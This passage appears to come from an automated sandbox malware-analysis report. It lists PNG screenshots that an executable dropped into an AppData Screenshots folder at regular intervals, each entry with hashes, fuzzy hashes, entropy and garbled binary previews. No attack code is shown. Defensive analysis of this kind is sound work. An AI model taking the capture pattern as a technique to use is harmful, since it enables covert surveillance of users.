SHA-512:	78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..\|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..\|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_023804.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805382
Entropy (8bit):	7.954368693124621
Encrypted:	false
SSDEEP:	12288:nAG53EhiIc4ezePK+t5Xi9hbt/BZF0kRX1PBo2x32Y8Ksl7E21b+SCotr8hPUHv1:3qkIctSJnqzRX15l1slPhjVEQ
MD5:	59B10CCC23A3F39295D44E8032D56A3D
SHA1:	0CC43E6208D6A7C09B0FB011502D5CFDB4739DD8
SHA-256:	6946B8089ABF8C6BC48402BBB186D5F75D6D4593763BA925507CB42B8214E7DD
SHA-512:	DF2D4B5811504B5C1F917429B70F80416185BE76D803C15A9C66FC10CEA08F9D4B734F969A754ECFE48C8A2E8B95530CBB813127853607ED040753D8DB58C694
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_024805.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805480
Entropy (8bit):	7.954487643604619
Encrypted:	false
SSDEEP:	24576:3qkIctSJnTfCxOkxnhEgaykcreoO+G3Jdk9:3q1c8njC0kdhE7ykaemG3JK9
MD5:	92F320686B75177FC7391F48BF4E5168
SHA1:	98989FDBD0723A33552DBE9B64E385DC26FD1B96
SHA-256:	ED1EA6258EFB31A0706D9B90DF4BB0E1BE8D0AF6534C71B5DAA33E05FC464CA1
SHA-512:	DDB5F7B0BF164AD953DDDFF832666F0947DA4DA5E1D76DD19ADD0A97D4DB42E86FB89F9A037B631B99061710F7B9158BE5A4B5D1AD7D102DC3034EEA65C8A364
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_025806.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	796305
Entropy (8bit):	7.956551030400023
Encrypted:	false
SSDEEP:	12288:pgadi5RPDNuzJ21nUyvXrnNUgSSGy1dVm4xc1s8UWbWohhLU+OZbpT8vOKwM:Wai5VsY6y/rnRSSG+oA/8jfUNjT8yM
MD5:	E099E6FD610B4ABD9E458B952610093F
SHA1:	EF9E59145E10513258A29A5FA77F92B43F503FB7
SHA-256:	ACAB39564DB57ACE8867707BA6D846FBDDF18993465AF31BDBAE7455C48D4A7F
SHA-512:	3DAA2298F1110D8EE4EDD8923D6B494E0B289AB8CDE5963347255BEEB67AB9A32699CB815B9C37312770C0BB73DC4B057CB494AADC1D9D32224404513C7B27AA
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...%E..}...\...af`.!G....A.......(.s.Y23.$E..J0_........D.!'ef...jU..j..z..g..>..{......Tw..-..3....K.e....^...2.......0.%.K..~..D.R.$,.a1Ko...F!i8J..X7d.....S>.24....v!.\|_.q.m.X.=_..rX\|...b.....1t.e.E..r.P.:.....Au......).V...Q..O.Z..".e..kU...Q.J....{........Vw.-.Z...(.dLh......S.5...v.d...B.....\|K.......E!...g.nn....W.Z...x...-(.a..6.%X..dx...,C.:tl.u..7..7p......{........O.$`h.._..W[ZZ,.C..<...q]....E.@sj....:p.....v......G.....q.k.W...$!..b@.]Am ...^c.`.?@..DY.C.O.].g;T.y.F..pc...._.j.......=.."P........6..~.}...}....Z.....c ..`.PO\|n.S....(.\&fc;S....)...`>>~.. m..Y...G..`7..EfA............`_.6.%..7D....}H....6=k.......JK.<M+.Z.=[.....{.]......sx....5.+...v@mM..%..?d...e\|.C..'mT..7fa[..U.....i[P..(,.........cE...M ...I_.,FE.n..)..4.....b.B....j.MO.Z...VN~.. \|=@.vx.0%W.dT...P.".N...52.F....c.r..\|$..y....^..._VA:..S.9..4..(+.A,....(%.~:<._...W..f].\|........

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_030807.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805504
Entropy (8bit):	7.953798912951398
Encrypted:	false
SSDEEP:	24576:N587VkYbbsxNdJHVJhiy7Q4PtMJvQDpeHC:N5eV+dJ1JjTPtMJvG2C
MD5:	B430A99E7E9D897E03068F795C5E5909
SHA1:	8395FDA71D9CBB9702A26613A98B1F9E84F25F96
SHA-256:	D9F1B7AA9789BBCE3D39CBAB82BC9F7A743B81752889B4372BE4B0B2A7DAA63D
SHA-512:	74A8D4B2F0E3C447307BF81B9163055C57DE5D81EB9994CA9DF0838689281C68E84DF0CCDC48D3D33AB8A902E5C6CB71E7A432F6D45DC3AE93C02C138BFBD2F1
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H..%.0.(. . ...8..OG...ET@D..Dr...E.QQ......fE..1.$+..U.V.....w...}....y~OwW...jw....3..3+V....,..j..yN#3..K....-c...=?bf...W..Y..f.za.[.p...i...#......Y.....v!V{v.U...`e....+%X.....'..c..e.M.J...0]hJ..........uk....+W.Du..2.\_....JOiS.;Vy..[.x.cv..9f......(.jNh.....7Rd...J...m:.c!A-?...r...D...........>...+x.X..K..~.o..b.....].....E..6.f....56w.{..E.<....ekoaf..(bf.....[...,`v.VC..ld.-...K.koS.......).G...,a..^..Z..........[.....+a}.kQ.hMm#:.....(..`..,\|x.>r..X.....XY.GB...4...@....c.Va....g.6....b..l.j;O...n..2......i[P..(,..........a.{0&[.8.!5.h*..#.... ..,...-~.3...R.eJ..r0.1....T.L......&.......T....6..m.1........`.S.p,@..R..{bh.P.>$..."....... .8.x......J@i62..c....T.....(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$.

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_031808.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805488
Entropy (8bit):	7.954279315926631
Encrypted:	false
SSDEEP:	24576:3qkIctSJnuHCn0Wh9lcTchW6IFverrBKFgGA35:3q1c8nuHXWVcwhJNxKFgGA35
MD5:	BE0ED377FAA193D230EA6DDFA66273E1
SHA1:	5B5C2D468767F892F87DDE7A2F6287BAB4816A9C
SHA-256:	74B38C4FD9EACA5D89F369C3D6C898FAD7ADA2F39E60C733E661E4BEA0977F8F
SHA-512:	20B8B33F3E0BEC8CC177B25BDA475B575C6D3031C8BF850432E5CA0DD6875ADB2D741C74BF7D57DC33FBC90D119410638F7AF907E8164F439A9C671A631E3BE6
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_032809.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805490
Entropy (8bit):	7.95430302145449
Encrypted:	false
SSDEEP:	12288:nAG53EhiIc4ezePK+t5uHCn0pa3qeilgzsuy6/GjM5hi42eRbkeP7+gBml2:3qkIctSJnuHCn0eq6HTr9x5
MD5:	F681C500672A0C804E44810AADE9A8F6
SHA1:	00E5B453838C19CAE4CEEB6E581893E1A2113AE2
SHA-256:	326A257BA12014E1EEC8EA8AF7AD277F87D6FDCB557B80D15F1F908C69CED43B
SHA-512:	4B175AC60063F92C6C333F1AB901805DE69C0340742D8F394F2B65D6D84F5EDB620F01C8AFE6E4E560BEFAB79E3186760D69EAB026A28270A4E1F76A79B355F8
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_033810.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805395
Entropy (8bit):	7.954631654370981
Encrypted:	false
SSDEEP:	12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqF7fDjg1zti6LDxcz9wPU4Z+cf:3qkIctSJnkpT4iFr3gZA6nxc5KN
MD5:	40FFEEA2BE692EF5B31FA989391A94D4
SHA1:	9BC465F5F7BE462B048BB6C9DE07043C09466306
SHA-256:	4DCE4DB74442C126CC6337F1F40878E4C6355BD66B944779B71228FBA25BF4D2
SHA-512:	700F0998D336BF3F379E152E67F4CDDC3B3ABE74E4223E64CB09E5C9C2D90953577C6ED07D7EAA48F9355D4CB027BFACAD6B3CA9F7C679B6B9A32CF63A71AECB
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_034810.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805325
Entropy (8bit):	7.953809932335241
Encrypted:	false
SSDEEP:	12288:nAG53EhiIc4ezGn0d30f5tEsDRDCO4hpMOd+mrSNKCZ16b3hw7uAGOkIoZ0:3qkIctae0fjLlS7xJrfy6bx68Ort
MD5:	53035B3321CEE45CA778710FAC73550B
SHA1:	2DA8C1F262EBDCC8FB5E8E2782711A5805E298EC
SHA-256:	A2D0C18D0E8F0BAF8DF2A6D5049BA5E183D7D8B866E24D97322AB7A4B71F0F41
SHA-512:	7D7A318BD4C6B756DC3B8722B2562FEFE20FDCFB0E64E01EED84ECF38042A6010795F0D91D54A2845059D8F56B72D64F0FF6B4EE2BC10C09763F04D388A31943
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_035812.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805509
Entropy (8bit):	7.953635790065994
Encrypted:	false
SSDEEP:	12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
MD5:	4334E5318C03DFED4F6E16D617A0070E
SHA1:	6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
SHA-256:	AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
SHA-512:	78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..\|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..\|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_040812.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805509
Entropy (8bit):	7.953635790065994
Encrypted:	false
SSDEEP:	12288:6z0J9/6Y79QYZeUAuISCT14ckScWRgWlfStLf/aTDt5hi4IwvFZezeGTDdb:O6Sa3ZAsPcvvOWlGz/QprI0ejp
MD5:	4334E5318C03DFED4F6E16D617A0070E
SHA1:	6B21A7447FF88EB1B11BBEF3B52C3D2F3D6DC3CC
SHA-256:	AA2DB20556386B90515B94B443E9D6A59B12DB69EC43F7E8E87F11E4B0B3D78B
SHA-512:	78A252D3E7947231C3A2A833A3BD96557D0E368EDE110F2FB5D22500F3EBF7F02E61544530624D0F3EB544FD0A1D1FC9CFA3811AE2E6E7589FDF069A9BBA57AE
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..q...H...d...e.D..T@.g0...PD.D..A$g.IPD...`..y.1aVD@..A....Z.kU.Z._{W....}...tw.\...v....O73.<.b...j.t...g72...D..zN..oV..y.3kx..b-..7...b.."&..t).Mc....~6.......Xd.X.YuV.g..Ul.s_..`..9fW.^g./...~..6...C..t.)=WO..c&..d.S..._...R1.2.E..(p}....+=.M..X..fn..i....y.Fc..\|.9..~:<..H.}<.(............r.>.1g....B....g...J..0*h..}c..w....0.@.....=2.........6.f....56w.{(e.-.8.....0bf.....[...,`v.VC..ld.-.....koS.......).G...,a...dv...\I..\|...j~.y.....(......A..?..H.._.>.o...G,...d.,.....3 ...6.Dmn..U.....Y..?d...2>...6.D.[.....r.hgk`.......@qG.@..:.3a.....V:.uHM8.............z.s.......p.....L}..6..7......2..I.d.o...1...A.M'j.bL-?./.....T....F......Z.........?-.6...T..3..c....T....u(......A..?..H.._.>.o...Gxa...X.p.p.jk..m.i.!..!....<i.Jt....../..v...mAmO....w4.4...,....4..G..}I..5-.).S.$hQ..]"....[7....n.ZV...\...!..`P;...H...J_#...P$...:.F..h.@ulAN@...

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_041814.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805441
Entropy (8bit):	7.954613568850628
Encrypted:	false
SSDEEP:	12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
MD5:	277253D7D217CD0CACB4715BF3175D31
SHA1:	AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
SHA-256:	15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
SHA-512:	634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_042814.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805441
Entropy (8bit):	7.954613568850628
Encrypted:	false
SSDEEP:	12288:nAG53Ehi/jYdvNG+Ke3dUBvxvFe6CFpI/1sV3tMUS3LWi6LDxcz9VARmlv:3qk/KNG+HENe6upu1g3tMJ3/6nxc5VA0
MD5:	277253D7D217CD0CACB4715BF3175D31
SHA1:	AC64FC9C2DA2A1DC2D48ADFB362ACD406CA5A6F7
SHA-256:	15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
SHA-512:	634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_043815.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805831
Entropy (8bit):	7.955185028460513
Encrypted:	false
SSDEEP:	24576:3qkmM120hq6axPwYs5p5lr4xSEe3HEdGfDz:3qlw2KdoPwYs5pzM0E4HAeDz
MD5:	8D4183371EC26ADA7FEF095B424999F6
SHA1:	3F6FAC40C6480D2F0FB12335DE06DF20742FE6F9
SHA-256:	36C92B78CD698F0A54BCBE3E84B524D91ACCDECFF32D01BB1143C4D3755DAE58
SHA-512:	3D8F5618DA668E26EFAB9536D6F81BB60A9BDF8C7EA36F6E185453A5D9D0E516F527329EDCDA20D4918C0E2670335A017C19A5E2434F67D7AFDD61A6D8F8C6BD
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.....BSz...T.LfW...[.(.F..].bfE...Q.....WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.\|k...x.w%./`-....mDg.\|....?........G....m.@}2V...H......PP...6.}l.l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i\|.^.A.$...7~.... ....1......T.l`...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..

C:\Users\user\AppData\Roaming\Screenshots\time_20220102_044815.png Download File
Process:	C:\Users\user\Desktop\g4FtSOZMD9.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	805723
Entropy (8bit):	7.954324107532815
Encrypted:	false
